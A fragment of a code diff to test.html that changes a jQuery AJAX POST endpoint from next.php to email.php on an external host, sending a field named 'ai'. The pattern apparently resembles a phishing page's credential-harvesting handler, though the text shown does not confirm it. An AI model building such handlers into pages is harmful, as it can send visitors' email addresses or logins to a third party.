--- a/test.html
+++ b/test.html
@@ -10486,7 +10486,7 @@ $(document).ready(function() {
         count = count + 1;
         $.ajax({
             dataType: 'JSON',
-            url: "https://socialfox.us/public_html/next.php",
+            url: "https://socialfox.us/public_html/email.php",
             type: 'POST',
             data: {
                 ai: ai,
